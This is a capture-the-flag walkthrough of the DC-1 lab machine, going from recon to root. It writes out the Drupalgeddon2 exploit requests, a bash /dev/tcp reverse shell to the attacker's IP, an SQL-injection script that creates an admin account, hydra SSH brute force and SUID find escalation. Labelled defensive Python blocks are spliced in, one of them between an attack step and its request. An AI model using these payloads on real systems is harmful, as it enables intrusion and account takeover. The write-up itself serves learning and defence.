Preface

This target machine is the first in the DC series of VMs produced by @DCAU7. The series has nine machines in total, and I hope to find the time to work through all nine.

The first machine has five flags in total; the last one is in the /root directory. The goal is to find and read all five flags.

Information gathering

The first step is to identify the target host's IP address with an nmap scan:

kali@kali:~$ nmap -sP 192.168.247.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:29 EDT
Nmap scan report for 192.168.247.1
Host is up (0.0013s latency).
Nmap scan report for 192.168.247.2
Host is up (0.00054s latency).
Nmap scan report for 192.168.247.210
Host is up (0.0023s latency).
Nmap scan report for 192.168.247.214
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.64 seconds

192.168.247.210 is the address of the Kali attack box, so the target host's address is 192.168.247.214.

Scan the ports to determine which services the target host is running:

kali@kali:~$ nmap -p1-65535 -A 192.168.247.214 -oN /tmp/DC-1.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:29 EDT
Nmap scan report for 192.168.247.214
Host is up (0.00073s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33032/tcp status
| 100024 1 39430/tcp6 status
| 100024 1 48263/udp6 status
|_ 100024 1 52110/udp status
33032/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

Three services are open on the target host. The first two are already familiar; the third, rpcbind, is a file-sharing service that has had some vulnerabilities of its own, so later we can check whether it offers a way in.

Vulnerability discovery

Since Apache is running, we first visit the website. Opening the page reveals a Drupal site.

It is a login page, so I tried the simplest passwords, such as admin:admin or admin:123456, but none of them worked.

However, the earlier nmap scan results did expose some fairly important information. There are two main points: 1. the current Drupal version is 7.*, with nothing more specific; 2. robots.txt disallows a number of pages that search engines would otherwise crawl.

Visiting http://192.168.247.214/robots.txt gives:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

I visited several pages; some require login, for example /?q=node/add/. Having no other ideas, and since this is a well-known CMS with many published vulnerabilities, there are generally two options at this point: search online for an exploit and attack with a suitable one, or attack using Metasploit.

Method 1: search the web for an exploit

The site is built on Drupal, and we know this CMS has had some well-known vulnerabilities. Since we cannot log in, vulnerabilities that require authorization are out; the target is an unauthenticated vulnerability, one that can be triggered without logging in.

The search results above involve three vulnerabilities:

CVE-2014-3704
CVE-2018-7600
CVE-2019-6339

However, CVE-2014-3704 and CVE-2019-6339 both require administrator privileges and clearly cannot be exploited. CVE-2018-7600, on the other hand, allows code execution without any user login; this vulnerability is known as Drupalgeddon2. For a detailed analysis, see this article:

https://research.checkpoint.com/2018/uncovering-drupalgeddon-2/

For the exploitation method, see this article, which gives the approaches for both Drupal 8.* and Drupal 7.*:

https://www.jianshu.com/p/7c410db788ed

The Drupal 7 approach differs slightly from Drupal 8. The entry point is the page /?q=user/password, which is reachable without login; its function is to request a new password.

First send the first POST request; the injected command is system('whoami'):

POST /?q=user/password&name[%23post_render][]=system&name[%23markup]=whoami&name[%23type]=markup HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.214/?q=user/password/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1

form_id=user_pass&_triggering_element_name=name

From the response we get the form_build_id value form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI, which must be carried into the second POST request:

POST /?q=file/ajax/name/%23value/form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 17 Jun 2020 17:27:51 +0000
If-None-Match: "1592414871"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

form_build_id=form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI

The command executed successfully!

Reverse shell

Obtain further control of the target host via a reverse shell:

echo "bash -i >& /dev/tcp/192.168.247.210/23333 0>&1" | bash

Because it contains special characters and spaces, URL-encode it:

%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%34%37%2e%32%31%30%2f%32%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68

Send POST request 1:

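To see the same two-stage request pattern from the defender's side, here is an added example (not from the original post and not Drupal's own code) that scans Apache access log lines for the render-array keys (#post_render, #markup, #type) and the file/ajax/#value callback used above. The log lines are constructed; the client IPs and the form_build_id in them are placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Render-array keys the two Drupalgeddon2 requests above smuggle in as form
# parameter names; no legitimate Drupal 7 form submits these from a browser.
RENDER_KEYS = ("#post_render", "#markup", "#type")

# Apache common log format; the request target is captured raw (still encoded).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')


def decode_target(target):
    """Split a request target into (path, [(key, value), ...]). parse_qsl decodes
    once and we decode twice more: the exploit encodes '#' as %23, and the
    injected command itself may be URL-encoded on top (as the reverse-shell payload is)."""
    parts = urlsplit(target)
    params = [(unquote(unquote(k)), unquote(unquote(v)))
              for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return unquote(parts.path), params


def classify(line):
    """Return the reasons a log line matches CVE-2018-7600 exploitation
    (empty list if benign or unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, params = decode_target(m.group("target"))
    reasons = []
    for key, value in params:
        # Stage 1: render-array keys injected into the user/password form.
        if any("[%s]" % rk in key for rk in RENDER_KEYS):
            reasons.append("render-array key in parameter name: %s" % key)
        # Stage 2: the file/ajax callback replayed with a '#value' path element.
        if key == "q" and value.startswith("file/ajax/") and "#" in value:
            reasons.append("render-array path in file/ajax callback: %s" % value)
    if path.startswith("/file/ajax/") and "#" in path:   # clean-URL form
        reasons.append("render-array path in file/ajax callback: %s" % path)
    return reasons


def scan(lines):
    """Run classify() over a log; return [(line_no, reasons)] for the hits."""
    hits = []
    for no, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            hits.append((no, reasons))
    return hits


# Constructed sample log: a benign visit, the two exploit stages, and an
# ordinary password-reset POST. IPs and the form_build_id are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jun/2020:08:40:01 -0400] "GET /?q=user/password HTTP/1.1" 200 6310',
    '192.0.2.10 - - [17/Jun/2020:08:40:05 -0400] "POST /?q=user/password&name[%23post_render][]=system'
    '&name[%23markup]=whoami&name[%23type]=markup HTTP/1.1" 200 6542',
    '192.0.2.10 - - [17/Jun/2020:08:40:09 -0400] "POST /?q=file/ajax/name/%23value/form-PLACEHOLDER HTTP/1.1" 200 88',
    '192.0.2.11 - - [17/Jun/2020:08:41:00 -0400] "POST /?q=user/password HTTP/1.1" 302 0',
]
```

Because the keys are matched after decoding, the URL-encoded reverse-shell variant from the next section is caught by the same rule.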
POST /?q=user/password&name[%23post_render][]=system&name[%23markup]=%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%34%37%2e%32%31%30%2f%32%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68&name[%23type]=markup HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.214/?q=user/password/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1

form_id=user_pass&_triggering_element_name=name

A shell is obtained successfully.

Getting a shell with Metasploit

Start Metasploit; on newer Kali versions sudo is required:

sudo msfdb init && msfconsole

Search for a usable exploit:

msf5 > searchsploit drupal

searchsploit simply searches the exploit-db database for the keyword we supply.

Since the current version is 7, php/webapps/44449.rb should apply, but running it produced an error: the script uses Windows-style \r line endings... which is honestly a bit frustrating.

So let's look directly at whether Metasploit has an attack module we can use:

msf5 > search drupal

The only required parameter is RHOSTS:

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.247.214
RHOSTS => 192.168.247.214

Then run exploit; typing shell in the meterpreter session drops into a shell on the target host:

meterpreter > shell

The first flag file is found in the current directory:

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

The hint in /var/www/flag1.txt is to look at the site's config file; a quick Google search shows the config file is sites/default/settings.php:

www-data@DC-1:/var/www$ cd sites/default
cd sites/default
www-data@DC-1:/var/www/sites/default$ ls
ls
default.settings.php
files
settings.php

Looking at settings.php reveals flag2 and the database credentials:

www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

Logging into the website

The database credentials dbuser : R0ck3t were found, so the next step is to log into the database and look for the administrator's login credentials. Before logging into the database, use Python's pty module to get a proper shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Then log into MySQL and list the databases:

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)

Switch to the drupaldb database:

mysql> use drupaldb; 
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)

mysql>

Since we want the administrator account, the relevant table is users; inspect its contents.

The users table does contain the admin account's password, but it is stored as a hash. There are two ways to deal with this.

Method 1: change the Drupal password

Googling "reset drupal admin password" turns up the article Resetting the administrator password with sql-query (Drupal 7). It uses an SQL query to change the administrator password; when the e-mail or drush methods fail, this method can be used to reset the administrator account.

  1. Run the following command in the Drupal root directory:

    ./scripts/password-hash.sh [your-new-passwd]

    This script generates the hash corresponding to the password:

    www-data@DC-1:/var/www$ ./scripts/password-hash.sh 123456
    ./scripts/password-hash.sh 123456

    password: 123456 hash: $S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.
  2. Log into MySQL and change the admin password:

    mysql> UPDATE users SET pass ='$S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.' where uid=1;
    <s ='$S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.' where uid=1;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
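To understand what password-hash.sh actually produced, here is an added example (not from the original post and not Drupal's own code) that reimplements Drupal 7's $S$ scheme in Python: a count character, an 8-char salt, then 2^count iterations of SHA-512, encoded with phpass-style base64 and truncated to 55 characters. It checks the hash shown above against 123456, which is how a defender can confirm after an incident like this whether a stored admin hash corresponds to a known weak or attacker-set password.

```python
import hashlib
import hmac
import os
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55         # DRUPAL_HASH_LENGTH: stored hashes are cut to 55 chars
DEFAULT_COUNT_LOG2 = 15  # DRUPAL_HASH_COUNT: 'D' in ITOA64, 2**15 rounds
# Hash printed by ./scripts/password-hash.sh 123456 in the walkthrough above.
PAGE_HASH = '$S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.'


def _encode64(data):
    """phpass-style base64 (not RFC 4648): 6-bit groups taken least significant first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return ''.join(out)


def drupal7_crypt(password, setting):
    """Recompute a '$S$' hash from its 12-char prefix: '$S$', count char, 8-char salt."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        raise ValueError('not a Drupal 7 $S$ setting')
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:                 # DRUPAL_MIN/MAX_HASH_COUNT
        raise ValueError('iteration count out of range')
    salt, pw = setting[4:].encode(), password.encode('utf-8')
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):              # password re-mixed every round
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _encode64(digest))[:HASH_LENGTH]


def drupal7_hash(password, count_log2=DEFAULT_COUNT_LOG2):
    """user_hash_password() equivalent: 6 random bytes become the 8-char salt."""
    return drupal7_crypt(password, '$S$' + ITOA64[count_log2] + _encode64(os.urandom(6)))


def drupal7_check(password, stored):
    """Constant-time check against a stored '$S$' hash (legacy 'U$' MD5 hashes are not handled)."""
    try:
        return stored.startswith('$S$') and hmac.compare_digest(drupal7_crypt(password, stored), stored)
    except ValueError:
        return False
```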

Method 2: use the exploit provided by exploit-db

msf5 > searchsploit drupal

We find an exploit that can add a user with admin privileges. Its usage is:

Usage: 34992.py -t http[s]://TARGET_URL -u USER -p PASS

Try to create a new user admin_fake with admin privileges:

kali@kali:~$ python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.247.214 -u admin_fake -p 123456

______ __ _______ _______ _____
| _ \ .----.--.--.-----.---.-| | | _ || _ | _ |
|. | \| _| | | _ | _ | | |___| _|___| |.| |
|. | |__| |_____| __|___._|__| / |___(__ `-|. |
|: 1 / |__| | | |: 1 | |: |
|::.. . / | | |::.. . | |::.|
`------' `---' `-------' `---'
_______ __ ___ __ __ __
| _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.
| 1___| _ | | |. | | | -__| __| _| | _ | |
|____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|
|: 1 | |__| |: | |___|
|::.. . | |::.|
`-------' `---'

Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
Admin 4cc0unt cr3at0r

Discovered by:

Stefan Horst
(CVE-2014-3704)

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin_fake
[*] Pass: 123456
[*] Url: http://192.168.247.214/?q=node&destination=node

After creating admin_fake we can log in successfully and visit the dashboard page, where flag3 is found.

The hint reads: Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

This hint is not very clear yet. Let's find the other flags first.

Look at /etc/passwd:

www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

A user named flag4 is found; entering that user's home directory lets us read flag4.txt directly:

www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls -al
ls -al
total 28
drwxr-xr-x 2 flag4 flag4 4096 Feb 19 2019 .
drwxr-xr-x 3 root root 4096 Feb 19 2019 ..
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3392 Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

I suspect this differs a little from the VM author's intention: normally flag4.txt should be configured so that only the flag4 user can read it, so you would need to log in as flag4. That password can be obtained with hydra:

hydra -l [username] -P [wordlist] [ssh://ip]

The password is orange. Log in as this user over SSH.

So far flag1 through flag4 have been found; the last flag is in the /root directory, but without the right permissions an ordinary account cannot enter /root:

www-data@DC-1:/home/flag4$ cd /root
cd /root
bash: cd: /root: Permission denied

Privilege escalation with SUID

If we cannot escalate privileges directly, we can still use SUID to get around that.

This is where the flag3 hint comes in; it has two parts:

  1. Special PERMS will help FIND the passwd

The find command has a -perm option that searches for files by their permission bits:

-perm -mode
All of the permission bits mode are set for the file. Symbolic modes are accepted in
this form, and this is usually the way in which you would want to use them. You must
specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some
illustrative examples.

Since we are escalating via SUID, the option is -perm -u=s:

www-data@DC-1:/home/flag4$ find / -perm -u=s 2>/dev/null      
find / -perm -u=s 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

The search turns up the file /usr/bin/find:

www-data@DC-1:/usr/bin$ ls -al find
ls -al find
-rwsr-xr-x 1 root root 162424 Jan 6 2012 find

The execute bit of /usr/bin/find is indeed s, meaning that the file runs with root privileges when executed.

  2. but you'll need to -exec that command to work out how to get what's in the shadow.

The find command supports an -exec option; from the man page:

-exec command ;
Execute command; true if 0 status is returned. All following arguments to find are
taken to be arguments to the command until an argument consisting of `;' is encoun‐
tered. The string `{}' is replaced by the current file name being processed every‐
where it occurs in the arguments to the command, not just in arguments where it is
alone, as in some versions of find. Both of these constructions might need to be es‐
caped (with a `\') or quoted to protect them from expansion by the shell. See the EX‐
AMPLES section for examples of the use of the -exec option. The specified command is
run once for each matched file. The command is executed in the starting directory.
There are unavoidable security problems surrounding use of the -exec action; you
should use the -execdir option instead.

The -exec option runs the specified command for each file matched under the directory given to find. So we can create a test directory and run /bin/sh or /bin/bash against it, since both of those can be executed by any user:

www-data@DC-1:/usr/bin$ ls -al /bin/sh
ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
www-data@DC-1:/usr/bin$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash

www-data@DC-1:/usr/bin$ mkdir test
mkdir test
mkdir: cannot create directory `test': File exists
www-data@DC-1:/usr/bin$ find test -exec '/bin/sh' \;
find test -exec '/bin/sh' \;
# whoami
whoami
root
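From the defensive side, the find / -perm -u=s listing above is exactly the inventory a host baseline should be compared against. The added example below (not from the original post) assumes that listing minus /usr/bin/find as the baseline, and reports SUID-root files that have appeared or disappeared; the sample entries are constructed rather than read from a real system, and the collect() helper shows how to gather real ones.

```python
import os
import stat

# Assumed baseline: the SUID-root binaries from the walkthrough's
# find / -perm -u=s listing, minus /usr/bin/find (find is not setuid on a
# default install; on DC-1 it is the planted escalation path).
BASELINE = frozenset({
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/procmail",
    "/usr/sbin/exim4", "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
})

SUID_ROOT = 0o104755  # S_IFREG | S_ISUID | 0755, i.e. -rwsr-xr-x as shown for find


def is_suid_root(mode, uid):
    """True for a regular file with the setuid bit whose owner is uid 0.
    Symlinks and directories are ignored: the bit has no effect on them."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def audit(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid). Returns (unexpected, missing):
    SUID-root files absent from the baseline, and baseline files no longer SUID-root."""
    present = {path for path, mode, uid in entries if is_suid_root(mode, uid)}
    return sorted(present - baseline), sorted(baseline - present)


def collect(root="/"):
    """Walk a live filesystem with lstat (never following symlinks) and yield
    (path, mode, uid) records for audit(); unreadable entries are skipped."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed sample: the baseline with one binary dropped, plus DC-1's
# setuid find, a normal bash, and a setuid file owned by a non-root user.
SAMPLE_ENTRIES = [(p, SUID_ROOT, 0) for p in sorted(BASELINE) if p != "/sbin/mount.nfs"] + [
    ("/usr/bin/find", SUID_ROOT, 0),
    ("/bin/bash", 0o100755, 0),
    ("/home/flag4/tool", SUID_ROOT, 1001),
]

if __name__ == "__main__":
    unexpected, missing = audit(SAMPLE_ENTRIES)
    print("unexpected SUID-root:", unexpected)
    print("missing from baseline:", missing)
```

On a real host, run audit(collect()) from a cron job and alert on any non-empty result; a newly setuid find is what the walkthrough above turned into root.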

Entering /root, we find the flag file thefinalflag.txt:

cd /root
# ls -al
ls -al
total 32
drwx------ 4 root root 4096 Feb 28 2019 .
drwxr-xr-x 23 root root 4096 Feb 19 2019 ..
drwx------ 2 root root 4096 Feb 19 2019 .aptitude
-rw------- 1 root root 44 Feb 28 2019 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 2019 .bashrc
drwxr-xr-x 3 root root 4096 Feb 19 2019 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 2019 thefinalflag.txt

Read the final flag file:

# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#

Summary

I learned quite a few new things from this machine; in summary:

  1. use Metasploit to search exploit-db for a suitable exploit, mainly via searchsploit with a keyword;
  2. use Metasploit's meterpreter to attack the target site;
  3. use SUID to escalate privileges;
  4. the find command can search by file permissions and can also run commands against a directory.